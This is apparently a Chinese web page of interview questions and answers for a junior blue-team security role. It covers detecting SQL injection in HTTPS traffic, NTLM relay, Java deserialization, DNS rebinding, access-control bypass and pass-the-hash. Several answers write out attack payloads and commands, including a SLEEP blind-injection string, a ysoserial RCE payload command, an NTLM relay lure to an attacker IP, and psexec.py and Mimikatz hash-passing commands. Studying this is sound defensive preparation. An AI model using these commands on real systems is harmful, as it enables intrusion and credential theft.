当前位置: 首页 > news >正文

深信服护网蓝初面试题

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

1. HTTPS流量分析(SQL注入识别)

题目:如何从HTTPS流量中识别SQL注入攻击?
答案

  • 解密方法
    1. 浏览器导出SSLKEYLOGFILE,Wireshark配置TLS会话密钥。

    2. 解密后筛选HTTP流量,搜索UNION SELECTSLEEP(等关键词。

  • 特征:异常长的URL参数、重复的单引号或注释符(如--)。

  • 工具:Wireshark、Burp Suite历史记录分析。

2. 时间盲注利用

题目:某SQL注入点无回显但未过滤SLEEP(),如何盲注获取数据库名长度?
答案

  • Payload
    ' AND IF(LENGTH(DATABASE())=8, SLEEP(5), 0)--

  • 自动化工具sqlmap -u "目标URL" --technique=T --time-sec=5 --dbms=mysql

  • 原理:通过响应时间差异判断条件真假。

3. NTLM Relay攻击

题目:内网中如何利用NTLM Relay攻击获取域控权限?
答案

  • 步骤
    1. 使用ResponderImpacket监听SMB/LDAP请求。

    2. 触发目标机器向攻击者发送NTLM认证(如钓鱼链接file://attackIP/恶意文件)。

    3. 将NTLM Hash Relay到域控,执行命令(如添加用户)。

  • 防御:启用SMB签名、限制NTLM使用。

4. 反序列化漏洞(RCE)

题目:某Java应用使用Apache Commons Collections 3.1,如何构造Payload实现RCE?
答案

  • 利用链InvokerTransformer链触发Runtime执行命令。

  • 工具:使用ysoserial生成Payload:
    java -jar ysoserial.jar CommonsCollections5 "cmd.exe /c calc" > payload.bin

  • 防御:升级依赖库、禁用危险反序列化类。

5. DNS Rebinding攻击

题目:解释DNS Rebinding攻击原理及防御方法。
答案

  • 原理:恶意网页通过短TTL域名绑定到内网IP,绕过同源策略攻击内网服务。

  • 防御
    • 浏览器限制DNS解析缓存时间。

    • 内网设备禁止响应外部DNS解析请求。

    • 应用层校验Host头与请求来源IP。

6. 垂直越权漏洞

题目:某CMS管理后台通过/admin路径判断权限,普通用户请求此路径返回403。如何绕过?
答案

  • 方法1:伪造Cookie或JWT令牌提升权限(如修改role=admin)。

  • 方法2:直接访问后台API接口(如/admin/addUser),绕过前端路由校验。

  • 防御:服务端校验用户角色、RBAC权限控制。

7. 内网横向移动(Pass the Hash)

题目:已获取内网某主机的NTLM Hash,如何横向移动到另一台主机?
答案

  • 工具
    • psexec.pypython psexec.py -hashes :<NTLM_Hash> DOMAIN/user@目标IP

    • Mimikatzsekurlsa::pth /user:Administrator /domain:test.com /ntlm:HASH

  • 防御:启用LSA保护、限制管理员账户登录范围。

相关文章:

  • TYUTJava阶段测试
  • Spring 概念
  • 初探:简道云系统架构及原理
  • 定时器的实现方案:红黑树、最小堆与时间轮
  • 【蓝桥杯速成】日期问题(填空题) + 真题讲解 python
  • POSIX线程库
  • 程序化广告行业(65/89):AdX/SSP系统深度剖析与实战要点
  • 《操作系统真象还原》第五章(3)——载入内核
  • JAVA学习-练习试用Java实现“实现一个Hadoop MapReduce任务,对大数据集中的数值进行排序和筛选”
  • 23种设计模式-行为型模式-中介者
  • 可以使用费曼学习法阅读重要的书籍
  • 【学Rust写CAD】34 精确 Alpha 混合函数(argb.rs补充方法)
  • 路由器的 WAN(广域网)口 和 LAN(局域网)口
  • 【微机及接口技术】- 第五章 输入输出与接口技术(下)
  • uniapp微信小程序引入vant组件库
  • docker部署rabbitmq
  • [刷题总结] 双指针 滑动窗口
  • 使用`sklearn`中的逻辑回归模型进行股票的情感分析,以及按日期统计积极和消极评论数量的功能
  • JavaScript箭头函数介绍(=>)(箭头函数不绑定自己的this,而是继承上下文的this;不能用于造函数)JavaScript =>
  • Linux网络应用层自定义协议与序列化
  • 进一步加强政府网站建设的通知/股票指数是什么意思
  • 制作电子商务网站页面/百度广告投诉电话
  • 十堰市茅箭区建设局网站/上海seo优化公司kinglink
  • 商河做网站公司/百度的网址是什么
  • 做饮品的网站/微商引流推广
  • 公司网站建设公司/公司建官网要多少钱